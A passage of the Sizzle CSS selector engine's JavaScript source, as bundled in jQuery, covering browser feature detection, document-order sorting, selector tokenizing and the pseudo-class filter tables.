		while ( (cur = cur.nextSibling) ) {
			if ( cur === b ) {
				return -1;
			}
		}
	}

	return a ? 1 : -1;
}

/**
 * Returns a function to use in pseudos for input types
 * @param {String} type
 */
function createInputPseudo( type ) {
	return function( elem ) {
		var name = elem.nodeName.toLowerCase();
		return name === "input" && elem.type === type;
	};
}

/**
 * Returns a function to use in pseudos for buttons
 * @param {String} type
 */
function createButtonPseudo( type ) {
	return function( elem ) {
		var name = elem.nodeName.toLowerCase();
		return (name === "input" || name === "button") && elem.type === type;
	};
}

/**
 * Returns a function to use in pseudos for positionals
 * @param {Function} fn
 */
function createPositionalPseudo( fn ) {
	return markFunction(function( argument ) {
		argument = +argument;
		return markFunction(function( seed, matches ) {
			var j,
				matchIndexes = fn( [], seed.length, argument ),
				i = matchIndexes.length;

			// Match elements found at the specified indexes
			while ( i-- ) {
				if ( seed[ (j = matchIndexes[i]) ] ) {
					seed[j] = !(matches[j] = seed[j]);
				}
			}
		});
	});
}

/**
 * Checks a node for validity as a Sizzle context
 * @param {Element|Object=} context
 * @returns {Element|Object|Boolean} The input node if acceptable, otherwise a falsy value
 */
function testContext( context ) {
	return context && typeof context.getElementsByTagName !== "undefined" && context;
}

// Expose support vars for convenience
support = Sizzle.support = {};

/**
 * Detects XML nodes
 * @param {Element|Object} elem An element or a document
 * @returns {Boolean} True iff elem is a non-HTML XML node
 */
isXML = Sizzle.isXML = function( elem ) {
	// documentElement is verified for cases where it doesn't yet exist
	// (such as loading iframes in IE - #4833)
	var documentElement = elem && (elem.ownerDocument || elem).documentElement;
	return documentElement ? documentElement.nodeName !== "HTML" : false;
};

/**
 * Sets document-related variables once based on the current document
 * @param {Element|Object} [doc] An element or document object to use to set the document
 * @returns {Object} Returns the current document
 */
setDocument = Sizzle.setDocument = function( node ) {
	var hasCompare, parent,
		doc = node ? node.ownerDocument || node : preferredDoc;

	// If no document and documentElement is available, return
	if ( doc === document || doc.nodeType !== 9 || !doc.documentElement ) {
		return document;
	}

	// Set our document
	document = doc;
	docElem = doc.documentElement;
	parent = doc.defaultView;

	// Support: IE>8
	// If iframe document is assigned to "document" variable and if iframe has been reloaded,
	// IE will throw "permission denied" error when accessing "document" variable, see jQuery #13936
	// IE6-8 do not support the defaultView property so parent will be undefined
	if ( parent && parent !== parent.top ) {
		// IE11 does not have attachEvent, so all must suffer
		if ( parent.addEventListener ) {
			parent.addEventListener( "unload", unloadHandler, false );
		} else if ( parent.attachEvent ) {
			parent.attachEvent( "onunload", unloadHandler );
		}
	}

	/* Support tests
	---------------------------------------------------------------------- */
	documentIsHTML = !isXML( doc );

	/* Attributes
	---------------------------------------------------------------------- */

	// Support: IE<8
	// Verify that getAttribute really returns attributes and not properties
	// (excepting IE8 booleans)
	support.attributes = assert(function( div ) {
		div.className = "i";
		return !div.getAttribute("className");
	});

	/* getElement(s)By*
	---------------------------------------------------------------------- */

	// Check if getElementsByTagName("*") returns only elements
	support.getElementsByTagName = assert(function( div ) {
		div.appendChild( doc.createComment("") );
		return !div.getElementsByTagName("*").length;
	});

	// Support: IE<9
	support.getElementsByClassName = rnative.test( doc.getElementsByClassName );

	// Support: IE<10
	// Check if getElementById returns elements by name
	// The broken getElementById methods don't pick up programatically-set names,
	// so use a roundabout getElementsByName test
	support.getById = assert(function( div ) {
		docElem.appendChild( div ).id = expando;
		return !doc.getElementsByName || !doc.getElementsByName( expando ).length;
	});

	// ID find and filter
	if ( support.getById ) {
		Expr.find["ID"] = function( id, context ) {
			if ( typeof context.getElementById !== "undefined" && documentIsHTML ) {
				var m = context.getElementById( id );
				// Check parentNode to catch when Blackberry 4.6 returns
				// nodes that are no longer in the document #6963
				return m && m.parentNode ? [ m ] : [];
			}
		};
		Expr.filter["ID"] = function( id ) {
			var attrId = id.replace( runescape, funescape );
			return function( elem ) {
				return elem.getAttribute("id") === attrId;
			};
		};
	} else {
		// Support: IE6/7
		// getElementById is not reliable as a find shortcut
		delete Expr.find["ID"];

		Expr.filter["ID"] =  function( id ) {
			var attrId = id.replace( runescape, funescape );
			return function( elem ) {
				var node = typeof elem.getAttributeNode !== "undefined" && elem.getAttributeNode("id");
				return node && node.value === attrId;
			};
		};
	}

	// Tag
	Expr.find["TAG"] = support.getElementsByTagName ?
		function( tag, context ) {
			if ( typeof context.getElementsByTagName !== "undefined" ) {
				return context.getElementsByTagName( tag );

			// DocumentFragment nodes don't have gEBTN
			} else if ( support.qsa ) {
				return context.querySelectorAll( tag );
			}
		} :

		function( tag, context ) {
			var elem,
				tmp = [],
				i = 0,
				// By happy coincidence, a (broken) gEBTN appears on DocumentFragment nodes too
				results = context.getElementsByTagName( tag );

			// Filter out possible comments
			if ( tag === "*" ) {
				while ( (elem = results[i++]) ) {
					if ( elem.nodeType === 1 ) {
						tmp.push( elem );
					}
				}

				return tmp;
			}
			return results;
		};

	// Class
	Expr.find["CLASS"] = support.getElementsByClassName && function( className, context ) {
		if ( documentIsHTML ) {
			return context.getElementsByClassName( className );
		}
	};

	/* QSA/matchesSelector
	---------------------------------------------------------------------- */

	// QSA and matchesSelector support

	// matchesSelector(:active) reports false when true (IE9/Opera 11.5)
	rbuggyMatches = [];

	// qSa(:focus) reports false when true (Chrome 21)
	// We allow this because of a bug in IE8/9 that throws an error
	// whenever `document.activeElement` is accessed on an iframe
	// So, we allow :focus to pass through QSA all the time to avoid the IE error
	// See http://bugs.jquery.com/ticket/13378
	rbuggyQSA = [];

	if ( (support.qsa = rnative.test( doc.querySelectorAll )) ) {
		// Build QSA regex
		// Regex strategy adopted from Diego Perini
		assert(function( div ) {
			// Select is set to empty string on purpose
			// This is to test IE's treatment of not explicitly
			// setting a boolean content attribute,
			// since its presence should be enough
			// http://bugs.jquery.com/ticket/12359
			docElem.appendChild( div ).innerHTML = "<a id='" + expando + "'></a>" +
				"<select id='" + expando + "-\f]' msallowcapture=''>" +
				"<option selected=''></option></select>";

			// Support: IE8, Opera 11-12.16
			// Nothing should be selected when empty strings follow ^= or $= or *=
			// The test attribute must be unknown in Opera but "safe" for WinRT
			// http://msdn.microsoft.com/en-us/library/ie/hh465388.aspx#attribute_section
			if ( div.querySelectorAll("[msallowcapture^='']").length ) {
				rbuggyQSA.push( "[*^$]=" + whitespace + "*(?:''|\"\")" );
			}

			// Support: IE8
			// Boolean attributes and "value" are not treated correctly
			if ( !div.querySelectorAll("[selected]").length ) {
				rbuggyQSA.push( "\\[" + whitespace + "*(?:value|" + booleans + ")" );
			}

			// Support: Chrome<29, Android<4.2+, Safari<7.0+, iOS<7.0+, PhantomJS<1.9.7+
			if ( !div.querySelectorAll( "[id~=" + expando + "-]" ).length ) {
				rbuggyQSA.push("~=");
			}

			// Webkit/Opera - :checked should return selected option elements
			// http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked
			// IE8 throws error here and will not see later tests
			if ( !div.querySelectorAll(":checked").length ) {
				rbuggyQSA.push(":checked");
			}

			// Support: Safari 8+, iOS 8+
			// https://bugs.webkit.org/show_bug.cgi?id=136851
			// In-page `selector#id sibing-combinator selector` fails
			if ( !div.querySelectorAll( "a#" + expando + "+*" ).length ) {
				rbuggyQSA.push(".#.+[+~]");
			}
		});

		assert(function( div ) {
			// Support: Windows 8 Native Apps
			// The type and name attributes are restricted during .innerHTML assignment
			var input = doc.createElement("input");
			input.setAttribute( "type", "hidden" );
			div.appendChild( input ).setAttribute( "name", "D" );

			// Support: IE8
			// Enforce case-sensitivity of name attribute
			if ( div.querySelectorAll("[name=d]").length ) {
				rbuggyQSA.push( "name" + whitespace + "*[*^$|!~]?=" );
			}

			// FF 3.5 - :enabled/:disabled and hidden elements (hidden elements are still enabled)
			// IE8 throws error here and will not see later tests
			if ( !div.querySelectorAll(":enabled").length ) {
				rbuggyQSA.push( ":enabled", ":disabled" );
			}

			// Opera 10-11 does not throw on post-comma invalid pseudos
			div.querySelectorAll("*,:x");
			rbuggyQSA.push(",.*:");
		});
	}

	if ( (support.matchesSelector = rnative.test( (matches = docElem.matches ||
		docElem.webkitMatchesSelector ||
		docElem.mozMatchesSelector ||
		docElem.oMatchesSelector ||
		docElem.msMatchesSelector) )) ) {

		assert(function( div ) {
			// Check to see if it's possible to do matchesSelector
			// on a disconnected node (IE 9)
			support.disconnectedMatch = matches.call( div, "div" );

			// This should fail with an exception
			// Gecko does not error, returns false instead
			matches.call( div, "[s!='']:x" );
			rbuggyMatches.push( "!=", pseudos );
		});
	}

	rbuggyQSA = rbuggyQSA.length && new RegExp( rbuggyQSA.join("|") );
	rbuggyMatches = rbuggyMatches.length && new RegExp( rbuggyMatches.join("|") );

	/* Contains
	---------------------------------------------------------------------- */
	hasCompare = rnative.test( docElem.compareDocumentPosition );

	// Element contains another
	// Purposefully does not implement inclusive descendent
	// As in, an element does not contain itself
	contains = hasCompare || rnative.test( docElem.contains ) ?
		function( a, b ) {
			var adown = a.nodeType === 9 ? a.documentElement : a,
				bup = b && b.parentNode;
			return a === bup || !!( bup && bup.nodeType === 1 && (
				adown.contains ?
					adown.contains( bup ) :
					a.compareDocumentPosition && a.compareDocumentPosition( bup ) & 16
			));
		} :
		function( a, b ) {
			if ( b ) {
				while ( (b = b.parentNode) ) {
					if ( b === a ) {
						return true;
					}
				}
			}
			return false;
		};

	/* Sorting
	---------------------------------------------------------------------- */

	// Document order sorting
	sortOrder = hasCompare ?
	function( a, b ) {

		// Flag for duplicate removal
		if ( a === b ) {
			hasDuplicate = true;
			return 0;
		}

		// Sort on method existence if only one input has compareDocumentPosition
		var compare = !a.compareDocumentPosition - !b.compareDocumentPosition;
		if ( compare ) {
			return compare;
		}

		// Calculate position if both inputs belong to the same document
		compare = ( a.ownerDocument || a ) === ( b.ownerDocument || b ) ?
			a.compareDocumentPosition( b ) :

			// Otherwise we know they are disconnected
			1;

		// Disconnected nodes
		if ( compare & 1 ||
			(!support.sortDetached && b.compareDocumentPosition( a ) === compare) ) {

			// Choose the first element that is related to our preferred document
			if ( a === doc || a.ownerDocument === preferredDoc && contains(preferredDoc, a) ) {
				return -1;
			}
			if ( b === doc || b.ownerDocument === preferredDoc && contains(preferredDoc, b) ) {
				return 1;
			}

			// Maintain original order
			return sortInput ?
				( indexOf( sortInput, a ) - indexOf( sortInput, b ) ) :
				0;
		}

		return compare & 4 ? -1 : 1;
	} :
	function( a, b ) {
		// Exit early if the nodes are identical
		if ( a === b ) {
			hasDuplicate = true;
			return 0;
		}

		var cur,
			i = 0,
			aup = a.parentNode,
			bup = b.parentNode,
			ap = [ a ],
			bp = [ b ];

		// Parentless nodes are either documents or disconnected
		if ( !aup || !bup ) {
			return a === doc ? -1 :
				b === doc ? 1 :
				aup ? -1 :
				bup ? 1 :
				sortInput ?
				( indexOf( sortInput, a ) - indexOf( sortInput, b ) ) :
				0;

		// If the nodes are siblings, we can do a quick check
		} else if ( aup === bup ) {
			return siblingCheck( a, b );
		}

		// Otherwise we need full lists of their ancestors for comparison
		cur = a;
		while ( (cur = cur.parentNode) ) {
			ap.unshift( cur );
		}
		cur = b;
		while ( (cur = cur.parentNode) ) {
			bp.unshift( cur );
		}

		// Walk down the tree looking for a discrepancy
		while ( ap[i] === bp[i] ) {
			i++;
		}

		return i ?
			// Do a sibling check if the nodes have a common ancestor
			siblingCheck( ap[i], bp[i] ) :

			// Otherwise nodes in our document sort first
			ap[i] === preferredDoc ? -1 :
			bp[i] === preferredDoc ? 1 :
			0;
	};

	return doc;
};

Sizzle.matches = function( expr, elements ) {
	return Sizzle( expr, null, null, elements );
};

Sizzle.matchesSelector = function( elem, expr ) {
	// Set document vars if needed
	if ( ( elem.ownerDocument || elem ) !== document ) {
		setDocument( elem );
	}

	// Make sure that attribute selectors are quoted
	expr = expr.replace( rattributeQuotes, "='$1']" );

	if ( support.matchesSelector && documentIsHTML &&
		( !rbuggyMatches || !rbuggyMatches.test( expr ) ) &&
		( !rbuggyQSA     || !rbuggyQSA.test( expr ) ) ) {

		try {
			var ret = matches.call( elem, expr );

			// IE 9's matchesSelector returns false on disconnected nodes
			if ( ret || support.disconnectedMatch ||
					// As well, disconnected nodes are said to be in a document
					// fragment in IE 9
					elem.document && elem.document.nodeType !== 11 ) {
				return ret;
			}
		} catch (e) {}
	}

	return Sizzle( expr, document, null, [ elem ] ).length > 0;
};

Sizzle.contains = function( context, elem ) {
	// Set document vars if needed
	if ( ( context.ownerDocument || context ) !== document ) {
		setDocument( context );
	}
	return contains( context, elem );
};

Sizzle.attr = function( elem, name ) {
	// Set document vars if needed
	if ( ( elem.ownerDocument || elem ) !== document ) {
		setDocument( elem );
	}

	var fn = Expr.attrHandle[ name.toLowerCase() ],
		// Don't get fooled by Object.prototype properties (jQuery #13807)
		val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?
			fn( elem, name, !documentIsHTML ) :
			undefined;

	return val !== undefined ?
		val :
		support.attributes || !documentIsHTML ?
			elem.getAttribute( name ) :
			(val = elem.getAttributeNode(name)) && val.specified ?
				val.value :
				null;
};

Sizzle.error = function( msg ) {
	throw new Error( "Syntax error, unrecognized expression: " + msg );
};

/**
 * Document sorting and removing duplicates
 * @param {ArrayLike} results
 */
Sizzle.uniqueSort = function( results ) {
	var elem,
		duplicates = [],
		j = 0,
		i = 0;

	// Unless we *know* we can detect duplicates, assume their presence
	hasDuplicate = !support.detectDuplicates;
	sortInput = !support.sortStable && results.slice( 0 );
	results.sort( sortOrder );

	if ( hasDuplicate ) {
		while ( (elem = results[i++]) ) {
			if ( elem === results[ i ] ) {
				j = duplicates.push( i );
			}
		}
		while ( j-- ) {
			results.splice( duplicates[ j ], 1 );
		}
	}

	// Clear input after sorting to release objects
	// See https://github.com/jquery/sizzle/pull/225
	sortInput = null;

	return results;
};

/**
 * Utility function for retrieving the text value of an array of DOM nodes
 * @param {Array|Element} elem
 */
getText = Sizzle.getText = function( elem ) {
	var node,
		ret = "",
		i = 0,
		nodeType = elem.nodeType;

	if ( !nodeType ) {
		// If no nodeType, this is expected to be an array
		while ( (node = elem[i++]) ) {
			// Do not traverse comment nodes
			ret += getText( node );
		}
	} else if ( nodeType === 1 || nodeType === 9 || nodeType === 11 ) {
		// Use textContent for elements
		// innerText usage removed for consistency of new lines (jQuery #11153)
		if ( typeof elem.textContent === "string" ) {
			return elem.textContent;
		} else {
			// Traverse its children
			for ( elem = elem.firstChild; elem; elem = elem.nextSibling ) {
				ret += getText( elem );
			}
		}
	} else if ( nodeType === 3 || nodeType === 4 ) {
		return elem.nodeValue;
	}
	// Do not include comment or processing instruction nodes

	return ret;
};

Expr = Sizzle.selectors = {

	// Can be adjusted by the user
	cacheLength: 50,

	createPseudo: markFunction,

	match: matchExpr,

	attrHandle: {},

	find: {},

	relative: {
		">": { dir: "parentNode", first: true },
		" ": { dir: "parentNode" },
		"+": { dir: "previousSibling", first: true },
		"~": { dir: "previousSibling" }
	},

	preFilter: {
		"ATTR": function( match ) {
			match[1] = match[1].replace( runescape, funescape );

			// Move the given value to match[3] whether quoted or unquoted
			match[3] = ( match[3] || match[4] || match[5] || "" ).replace( runescape, funescape );

			if ( match[2] === "~=" ) {
				match[3] = " " + match[3] + " ";
			}

			return match.slice( 0, 4 );
		},

		"CHILD": function( match ) {
			/* matches from matchExpr["CHILD"]
				1 type (only|nth|...)
				2 what (child|of-type)
				3 argument (even|odd|\d*|\d*n([+-]\d+)?|...)
				4 xn-component of xn+y argument ([+-]?\d*n|)
				5 sign of xn-component
				6 x of xn-component
				7 sign of y-component
				8 y of y-component
			*/
			match[1] = match[1].toLowerCase();

			if ( match[1].slice( 0, 3 ) === "nth" ) {
				// nth-* requires argument
				if ( !match[3] ) {
					Sizzle.error( match[0] );
				}

				// numeric x and y parameters for Expr.filter.CHILD
				// remember that false/true cast respectively to 0/1
				match[4] = +( match[4] ? match[5] + (match[6] || 1) : 2 * ( match[3] === "even" || match[3] === "odd" ) );
				match[5] = +( ( match[7] + match[8] ) || match[3] === "odd" );

			// other types prohibit arguments
			} else if ( match[3] ) {
				Sizzle.error( match[0] );
			}

			return match;
		},

		"PSEUDO": function( match ) {
			var excess,
				unquoted = !match[6] && match[2];

			if ( matchExpr["CHILD"].test( match[0] ) ) {
				return null;
			}

			// Accept quoted arguments as-is
			if ( match[3] ) {
				match[2] = match[4] || match[5] || "";

			// Strip excess characters from unquoted arguments
			} else if ( unquoted && rpseudo.test( unquoted ) &&
				// Get excess from tokenize (recursively)
				(excess = tokenize( unquoted, true )) &&
				// advance to the next closing parenthesis
				(excess = unquoted.indexOf( ")", unquoted.length - excess ) - unquoted.length) ) {

				// excess is a negative index
				match[0] = match[0].slice( 0, excess );
				match[2] = unquoted.slice( 0, excess );
			}

			// Return only captures needed by the pseudo filter method (type and argument)
			return match.slice( 0, 3 );
		}
	},

	filter: {

		"TAG": function( nodeNameSelector ) {
			var nodeName = nodeNameSelector.replace( runescape, funescape ).toLowerCase();
			return nodeNameSelector === "*" ?
				function() { return true; } :
				function( elem ) {
					return elem.nodeName && elem.nodeName.toLowerCase() === nodeName;
				};
		},

		"CLASS": function( className ) {
			var pattern = classCache[ className + " " ];

			return pattern ||
				(pattern = new RegExp( "(^|" + whitespace + ")" + className + "(" + whitespace + "|$)" )) &&
				classCache( className, function( elem ) {
					return pattern.test( typeof elem.className === "string" && elem.className || typeof elem.getAttribute !== "undefined" && elem.getAttribute("class") || "" );
				});
		},

		"ATTR": function( name, operator, check ) {
			return function( elem ) {
				var result = Sizzle.attr( elem, name );

				if ( result == null ) {
					return operator === "!=";
				}
				if ( !operator ) {
					return true;
				}

				result += "";

				return operator === "=" ? result === check :
					operator === "!=" ? result !== check :
					operator === "^=" ? check && result.indexOf( check ) === 0 :
					operator === "*=" ? check && result.indexOf( check ) > -1 :
					operator === "$=" ? check && result.slice( -check.length ) === check :
					operator === "~=" ? ( " " + result.replace( rwhitespace, " " ) + " " ).indexOf( check ) > -1 :
					operator === "|=" ? result === check || result.slice( 0, check.length + 1 ) === check + "-" :
					false;
			};
		},

		"CHILD": function( type, what, argument, first, last ) {
			var simple = type.slice( 0, 3 ) !== "nth",
				forward = type.slice( -4 ) !== "last",
				ofType = what === "of-type";

			return first === 1 && last === 0 ?

				// Shortcut for :nth-*(n)
				function( elem ) {
					return !!elem.parentNode;
				} :

				function( elem, context, xml ) {
					var cache, outerCache, node, diff, nodeIndex, start,
						dir = simple !== forward ? "nextSibling" : "previousSibling",
						parent = elem.parentNode,
						name = ofType && elem.nodeName.toLowerCase(),
						useCache = !xml && !ofType;

					if ( parent ) {

						// :(first|last|only)-(child|of-type)
						if ( simple ) {
							while ( dir ) {
								node = elem;
								while ( (node = node[ dir ]) ) {
									if ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) {
										return false;
									}
								}
								// Reverse direction for :only-* (if we haven't yet done so)
								start = dir = type === "only" && !start && "nextSibling";
							}
							return true;
						}

						start = [ forward ? parent.firstChild : parent.lastChild ];

						// non-xml :nth-child(...) stores cache data on `parent`
						if ( forward && useCache ) {
							// Seek `elem` from a previously-cached index
							outerCache = parent[ expando ] || (parent[ expando ] = {});
							cache = outerCache[ type ] || [];
							nodeIndex = cache[0] === dirruns && cache[1];
							diff = cache[0] === dirruns && cache[2];
							node = nodeIndex && parent.childNodes[ nodeIndex ];

							while ( (node = ++nodeIndex && node && node[ dir ] ||

								// Fallback to seeking `elem` from the start
								(diff = nodeIndex = 0) || start.pop()) ) {

								// When found, cache indexes on `parent` and break
								if ( node.nodeType === 1 && ++diff && node === elem ) {
									outerCache[ type ] = [ dirruns, nodeIndex, diff ];
									break;
								}
							}

						// Use previously-cached element index if available
						} else if ( useCache && (cache = (elem[ expando ] || (elem[ expando ] = {}))[ type ]) && cache[0] === dirruns ) {
							diff = cache[1];

						// xml :nth-child(...) or :nth-last-child(...) or :nth(-last)?-of-type(...)
						} else {
							// Use the same loop as above to seek `elem` from the start
							while ( (node = ++nodeIndex && node && node[ dir ] ||
								(diff = nodeIndex = 0) || start.pop()) ) {

								if ( ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) && ++diff ) {
									// Cache the index of each encountered element
									if ( useCache ) {
										(node[ expando ] || (node[ expando ] = {}))[ type ] = [ dirruns, diff ];
									}

									if ( node === elem ) {
										break;
									}
								}
							}
						}

						// Incorporate the offset, then check against cycle size
						diff -= last;
						return diff === first || ( diff % first === 0 && diff / first >= 0 );
					}
				};
		},

		"PSEUDO": function( pseudo, argument ) {
			// pseudo-class names are case-insensitive
			// http://www.w3.org/TR/selectors/#pseudo-classes
			// Prioritize by case sensitivity in case custom pseudos are added with uppercase letters
			// Remember that setFilters inherits from pseudos
			var args,
				fn = Expr.pseudos[ pseudo ] || Expr.setFilters[ pseudo.toLowerCase() ] ||
					Sizzle.error( "unsupported pseudo: " + pseudo );

			// The user may use createPseudo to indicate that
			// arguments are needed to create the filter function
			// just as Sizzle does
			if ( fn[ expando ] ) {
				return fn( argument );
			}

			// But maintain support for old signatures
			if ( fn.length > 1 ) {
				args = [ pseudo, pseudo, "", argument ];
				return Expr.setFilters.hasOwnProperty( pseudo.toLowerCase() ) ?
					markFunction(function( seed, matches ) {
						var idx,
							matched = fn( seed, argument ),
							i = matched.length;
						while ( i-- ) {
							idx = indexOf( seed, matched[i] );
							seed[ idx ] = !( matches[ idx ] = matched[i] );
						}
					}) :
					function( elem ) {
						return fn( elem, 0, args );
					};
			}

			return fn;
		}
	},

	pseudos: {
		// Potentially complex pseudos
		"not": markFunction(function( selector ) {
			// Trim the selector passed to compile
			// to avoid treating leading and trailing
			// spaces as combinators
			var input = [],
				results = [],
				matcher = compile( selector.replace( rtrim, "$1" ) );

			return matcher[ expando ] ?
				markFunction(function( seed, matches, context, xml ) {
					var elem,
						unmatched = matcher( seed, null, xml, [] ),
						i = seed.length;

					// Match elements unmatched by `matcher`
					while ( i-- ) {
						if ( (elem = unmatched[i]) ) {
							seed[i] = !(matches[i] = elem);
						}
					}
				}) :
				function( elem, context, xml ) {
					input[0] = elem;
					matcher( input, null, xml, results );
					// Don't keep the element (issue #299)
					input[0] = null;
					return !results.pop();
				};
		}),

		"has": markFunction(function( selector ) {
			return function( elem ) {
				return Sizzle( selector, elem ).length > 0;
			};
		}),

		"contains": markFunction(function( text ) {
			text = text.replace( runescape, funescape );
			return function( elem ) {
				return ( elem.textContent || elem.innerText || getText( elem ) ).indexOf( text ) > -1;
			};
		}),

		// "Whether an element is represented by a :lang() selector
		// is based solely on the element's language value
		// being equal to the identifier C,
		// or beginning with the identifier C immediately followed by "-".
		// The matching of C against the element's language value is performed case-insensitively.
		// The identifier C does not have to be a valid language name."
		// http://www.w3.org/TR/selectors/#lang-pseudo
		"lang": markFunction( function( lang ) {
			// lang value must be a valid identifier
			if ( !ridentifier.test(lang || "") ) {
				Sizzle.error( "unsupported lang: " + lang );
			}
			lang = lang.replace( runescape, funescape ).toLowerCase();
			return function( elem ) {
				var elemLang;
				do {
					if ( (elemLang = documentIsHTML ?
						elem.lang :
						elem.getAttribute("xml:lang") || elem.getAttribute("lang")) ) {

						elemLang = elemLang.toLowerCase();
						return elemLang === lang || elemLang.indexOf( lang + "-" ) === 0;
					}
				} while ( (elem = elem.parentNode) && elem.nodeType === 1 );
				return false;
			};
		}),

		// Miscellaneous
		"target": function( elem ) {
			var hash = window.location && window.location.hash;
			return hash && hash.slice( 1 ) === elem.id;
		},

		"root": function( elem ) {
			return elem === docElem;
		},

		"focus": function( elem ) {
			return elem === document.activeElement && (!document.hasFocus || document.hasFocus()) && !!(elem.type || elem.href || ~elem.tabIndex);
		},

		// Boolean properties
		"enabled": function( elem ) {
			return elem.disabled === false;
		},

		"disabled": function( elem ) {
			return elem.disabled === true;
		},

		"checked": function( elem ) {
			// In CSS3, :checked should return both checked and selected elements
			// http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked
			var nodeName = elem.nodeName.toLowerCase();
			return (nodeName === "input" && !!elem.checked) || (nodeName === "option" && !!elem.selected);
		},

		"selected": function( elem ) {
			// Accessing this property makes selected-by-default
			// options in Safari work properly
			if ( elem.parentNode ) {
				elem.parentNode.selectedIndex;
			}

			return elem.selected === true;
		},

		// Contents
		"empty": function( elem ) {
			// http://www.w3.org/TR/selectors/#empty-pseudo
			// :empty is negated by element (1) or content nodes (text: 3; cdata: 4; entity ref: 5),
			//   but not by others (comment: 8; processing instruction: 7; etc.)
			// nodeType < 6 works because attributes (2) do not appear as children
			for ( elem = elem.firstChild; elem; elem = elem.nextSibling ) {
				if ( elem.nodeType < 6 ) {
					return false;
				}
			}
			return true;
		},

		"parent": function( elem ) {
			return !Expr.pseudos["empty"]( elem );
		},

		// Element/input types
		"header": function( elem ) {
			return rheader.test( elem.nodeName );
		},

		"input": function( elem ) {
			return rinputs.test( elem.nodeName );
		},

		"button": function( elem ) {
			var name = elem.nodeName.toLowerCase();
			return name === "input" && elem.type === "button" || name === "button";
		},

		"text": function( elem ) {
			var attr;
			return elem.nodeName.toLowerCase() === "input" &&
				elem.type === "text" &&

				// Support: IE<8
				// New HTML5 attribute values (e.g., "search") appear with elem.type === "text"
				( (attr = elem.getAttribute("type")) == null || attr.toLowerCase() === "text" );
		},

		// Position-in-collection
		"first": createPositionalPseudo(function() {
			return [ 0 ];
		}),

		"last": createPositionalPseudo(function( matchIndexes, length ) {
			return [ length - 1 ];
		}),

		"eq": createPositionalPseudo(function( matchIndexes, length, argument ) {
			return [ argument < 0 ? argument + length : argument ];
		}),

		"even": createPositionalPseudo(function( matchIndexes, length ) {
			var i = 0;
			for ( ; i < length; i += 2 ) {
				matchIndexes.push( i );
			}
			return matchIndexes;
		}),

		"odd": createPositionalPseudo(function( matchIndexes, length ) {
			var i = 1;
			for ( ; i < length; i += 2 ) {
				matchIndexes.push( i );
			}
			return matchIndexes;
		}),

		"lt": createPositionalPseudo(function( matchIndexes, length, argument ) {
			var i = argument < 0 ? argument + length : argument;
			for ( ; --i >= 0; ) {
				matchIndexes.push( i );
			}
			return matchIndexes;
		}),

		"gt": createPositionalPseudo(function( matchIndexes, length, argument ) {
			var i = argument < 0 ? argument + length : argument;
			for ( ; ++i < length; ) {
				matchIndexes.push( i );
			}
			return matchIndexes;
		})
	}
};

Expr.pseudos["nth"] = Expr.pseudos["eq"];

// Add button/input type pseudos
for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) {
	Expr.pseudos[ i ] = createInputPseudo( i );
}
for ( i in { submit: true, reset: true } ) {
	Expr.pseudos[ i ] = createButtonPseudo( i );
}

// Easy API for creating new setFilters
function setFilters() {}
setFilters.prototype = Expr.filters = Expr.pseudos;
Expr.setFilters = new setFilters();

tokenize = Sizzle.tokenize = function( selector, parseOnly ) {
	var matched, match, tokens, type,
		soFar, groups, preFilters,
		cached = tokenCache[ selector + " " ];

	if ( cached ) {
		return parseOnly ? 0 : cached.slice( 0 );
	}

	soFar = selector;
	groups = [];
	preFilters = Expr.preFilter;

	while ( soFar ) {

		// Comma and first run
		if ( !matched || (match = rcomma.exec( soFar )) ) {
			if ( match ) {
				// Don't consume trailing commas as valid
				soFar = soFar.slice( match[0].length ) || soFar;
			}
			groups.push( (tokens = []) );
		}

		matched = false;

		// Combinators
		if ( (match = rcombinators.exec( soFar )) ) {
			matched = match.shift();
			tokens.push({
				value: matched,
				// Cast descendant combinators to space
				type: match[0].replace( rtrim, " " )
			});
			soFar = soFar.slice( matched.length );
		}

		// Filters
		for ( type in Expr.filter ) {
			if ( (match = matchExpr[ type ].exec( soFar )) && (!preFilters[ type ] ||
				(match = preFilters[ type ]( match ))) ) {
				matched = match.shift();
				tokens.push({
					value: matched,
					type: type,
					matches: match
				});
				soFar = soFar.slice( matched.length );
			}
		}

		if ( !matched ) {
			break;
		}
	}

	// Return the length of the invalid excess
	// if we're just parsing
	// Otherwise, throw an error or return tokens
	return parseOnly ?
		soFar.length :
		soFar ?
			Sizzle.error( selector ) :
			// Cache the tokens
			tokenCache( selector, groups ).slice( 0 );
};

function toSelector( tokens ) {
	var i = 0,
		len = tokens.length,
		selector = "";
	for ( ; i < len; i++ ) {
		selector += tokens[i].value;
	}
	return selector;
}

function addCombinator( matcher, combinator, base ) {
	var dir = combinator.dir,
		checkNonElements = base && dir === "parentNode",
		doneName = done++;

	return combinator.first ?
		// Check against closest ancestor/preceding element
		function( elem, context, xml ) {
			while ( (elem = elem[ dir ]) ) {
				if ( elem.nodeType === 1 || checkNonElements ) {
					return matcher( elem, context, xml );
				}
			}
		} :

		// Check against all ancestor/preceding elements
		function( elem, context, xml ) {
			var oldCache, outerCache,
				newCache = [ dirruns, doneName ];

			// We can't set arbitrary data on XML nodes, so they don't benefit from dir caching
			if ( xml ) {
				while ( (elem = elem[ dir ]) ) {
					if ( elem.nodeType === 1 || checkNonElements ) {
						if ( matcher( elem, context, xml ) ) {
							return true;
						}
					}
				}
			} else {
				while ( (elem = elem[ dir ]) ) {
					if ( elem.nodeType === 1 || checkNonElements ) {
						outerCache = elem[ expando ] || (elem[ expando ] = {});
						if ( (oldCache = outerCache[ dir ]) &&
							oldCache[ 0 ] === dirruns && oldCache[ 1 ] === doneName ) {

							// Assign to newCache so results back-propagate to previous elements
							return (newCache[ 2 ] = oldCache[ 2 ]);
						} else {
							// Reuse newcache so results back-propagate to previous elements
							outerCache[ dir ] = newCache;

							// A match means we're done; a fail means we have to keep checking
							if ( (newCache[ 2 ] = matcher( elem, context, xml )) ) {
								return true;
							}
						}
					}
				}
			}
		};
}

function elementMatcher( matchers ) {
	return matchers.length > 1 ?
		function( elem, context, xml ) {
			var i = matchers.length;
			while ( i-- ) {
				if ( !matchers[i]( elem, context, xml ) ) {
					return false;
				}
			}
			return true;
		} :
		matchers[0];
}

function multipleContexts( selector, contexts, results ) {
	var i = 0,
		len = contexts.length;
	for ( ; i < len; i++ ) {
